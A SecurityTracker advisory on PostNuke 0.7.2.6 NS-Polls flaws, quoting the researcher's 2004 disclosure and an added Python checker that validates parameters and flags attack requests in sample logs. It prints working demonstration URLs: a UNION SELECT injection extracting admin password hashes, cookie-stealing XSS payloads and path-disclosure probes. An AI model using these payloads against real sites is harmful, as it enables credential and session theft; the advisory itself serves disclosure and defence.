PostNuke NS-Polls Input Validation Hole in 'pn_uid' Permits SQL Injection
SecurityTracker Alert ID: 1009851
SecurityTracker URL: http://securitytracker.com/id?1009851
CVE Reference: GENERIC-MAP-NOMATCH
OSVDB Reference: 5510, 5509, 5521
Updated: Sep 3 2004
Original Entry Date: Apr 19 2004
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 0.7.2.6
Description: Several vulnerabilities were reported in PostNuke. A remote user can inject SQL commands and conduct cross-site scripting attacks. A remote user can determine the installation path.

Janek Vind "waraxe" reported that a remote user can supply a specially crafted 'pn_uid' variable to the 'NS-Polls' module to inject SQL commands. If the target system is running MySQL version 4.0 or higher with UNION functionality enabled, then a remote user can execute arbitrary SQL commands on the underlying database. A demonstration exploit URL is provided:

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*

It is also reported that the 'order' variable in the 'modload' function is not properly filtered to remove HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PostNuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Some demonstration exploit URLs are provided:

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s>ppp&thold=99

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie);

It is also reported that a remote user can request the 'Past_Nuke' module with an 'op' parameter value of 'deleteNotice' to cause the system to display an error message that discloses the installation path. A demonstration exploit URL is provided:

http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice

A remote user can also execute an SQL command to determine the installation path, the report said. A demonstration exploit URL is provided:

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p
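All three NS-Polls issues above come down to request parameters ('thold', 'order', 'pollID') being passed through without type or allowlist checks. The following is an added example written for this page, not PostNuke's own code: it applies the validation the module should have enforced (integers must be decimal integers, 'order' and 'mode' must come from a fixed set) to a request URL, and then runs the same check over a few constructed access-log lines so the advisory's demonstration requests can be triaged after the fact. The accepted values for 'order' and 'mode' are assumptions; the page does not give the module's real ones.

```python
"""Defender-side parameter checker for the NS-Polls request described in this
advisory. This is an added example, not PostNuke's own code, and the allowlists
for 'order' and 'mode' are assumptions (the module's real accepted values are
not given on the page).

It enforces the validation the vulnerable module lacked:
  * pollID and thold must be plain decimal integers (thold is the injectable one)
  * order and mode must come from a fixed allowlist
and reports every violation, which is also what a WAF rule or an access-log
triage script would key on.
"""
import re
from urllib.parse import parse_qsl, urlsplit

INT_PARAMS = ("pollID", "thold")
ALLOWED_ORDER = {"0", "1"}                   # assumed: ascending / descending
ALLOWED_MODE = {"thread", "flat", "nested"}  # assumed display modes
DECIMAL = re.compile(r"[0-9]+")              # stricter than str.isdigit (no Unicode digits)


def validate_ns_polls(url: str) -> list:
    """Return the list of rejection reasons for a request URL (empty = clean)."""
    # parse_qsl percent-decodes, so '%20UNION%20SELECT' and '%00' become visible;
    # keep_blank_values keeps an empty 'thold=' in the dict instead of dropping it.
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    reasons = []
    for name in INT_PARAMS:
        value = params.get(name)
        if value is not None and not DECIMAL.fullmatch(value):
            reasons.append(f"{name} is not an integer: {value[:40]!r}")
    order = params.get("order")
    if order is not None and order not in ALLOWED_ORDER:
        reasons.append(f"order not in allowlist: {order[:40]!r}")
    mode = params.get("mode")
    if mode is not None and mode not in ALLOWED_MODE:
        reasons.append(f"mode not in allowlist: {mode[:40]!r}")
    return reasons


# Constructed sample access-log lines (common log format); not from the page.
# Line 1 is a legitimate request; line 2 carries the advisory's UNION SELECT
# request, line 3 the XSS request, line 4 the path-disclosure probe (thold=p).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Apr/2004:12:33:22 -0700] "GET /postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0 HTTP/1.1" 200 5120
10.0.0.9 - - [18/Apr/2004:12:34:01 -0700] "GET /postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/* HTTP/1.1" 200 6210
10.0.0.9 - - [18/Apr/2004:12:35:17 -0700] "GET /postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie); HTTP/1.1" 200 5300
10.0.0.9 - - [18/Apr/2004:12:36:40 -0700] "GET /postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p HTTP/1.1" 200 310
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_log_lines(log_text: str) -> list:
    """Run the checker over NS-Polls requests in an access log.

    Returns (client_ip, reasons) for each request that fails validation.
    """
    flagged = []
    for line in log_text.splitlines():
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        target = match.group(1)
        if "name=NS-Polls" not in target:
            continue  # only the module this advisory covers
        reasons = validate_ns_polls(target)
        if reasons:
            flagged.append((line.split()[0], reasons))
    return flagged


if __name__ == "__main__":
    for ip, reasons in flag_log_lines(SAMPLE_LOG):
        print(ip, "->", "; ".join(reasons))
```

The checker rejects by type and allowlist rather than by searching for strings such as UNION or <script>, so it catches the path-disclosure probe (thold=p) and the NUL-byte tag variant just as it catches the plain UNION SELECT request; a signature list would have to enumerate each of those separately.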
Impact: A remote user can inject SQL commands on the target system. This
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PostNuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A remote user can determine the installation path.

Solution: The vendor has released a fix (as of version .726-3), available at:
http://downloads.postnuke.com/

Vendor URL: www.postnuke.com/

Cause: Access control error, Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Janek Vind <come2waraxe@yahoo.com>

Message History: None.

Source Message Contents
Date: Sun, 18 Apr 2004 12:33:22 -0700 (PDT)
From: Janek Vind <come2waraxe@yahoo.com>
Subject: [Full-Disclosure] [waraxe-2004-SA#020 - Multiple vulnerabilities in PostNuke 0.726 Phoenix]

{================================================================================}
{ [waraxe-2004-SA#020]                                                           }
{                                                                                }
{ [ Multiple vulnerabilities in PostNuke 0.726 Phoenix ]                         }
{                                                                                }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 18. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=20
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PostNuke: The Phoenix Release (0.7.2.6)

PostNuke is an open source, open development content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place.

If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/

You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke

Or at the Community Forums located at: http://forums.postnuke.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:

A1 - legacy code
http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice

Fatal error: Call to undefined function: deletenotice() in D:\apache_wwwroot\postnuke0726\admin.php on line 87

It seems that this function - deletenotice() - is removed in new versions, but the reference still exists. Btw, anyone without any authentication can provoke this error, not only admins.

A2 - path disclosure through sql injection
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p

Fatal error: Call to a member function on a non-object in D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php on line 454

This is an sql injection bug through the variable named "thold", but here we use it for path disclosure.

B. Cross-site scripting aka XSS:

Exploiting XSS in PostNuke is a difficult task, because PostNuke will filter out most of the "useful" tags, like <script>. But anyway, there exist XSS bugs and they can be exploited using some custom techniques (therefore losing cross-browser compatibility of the sploit).

B1 - XSS through unsanitized variable "$order"
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s%00cript>ppp&thold=99
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie);

C. Sql injection:

C1 - critical sql injection in NS-Polls

This is a devastating case of sql injection, because it can be used to pull out from the database ANY data the attacker needs.
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*

... and we will see the admin's username, email and password's md5 hash in plaintext ;)

Remark - this sploit needs mysql version >=4.x with UNION functionality enabled!
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Greetings!
Special greets to UT Bee Clan members at http://bees.tk ! "Boom!!" ;)

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------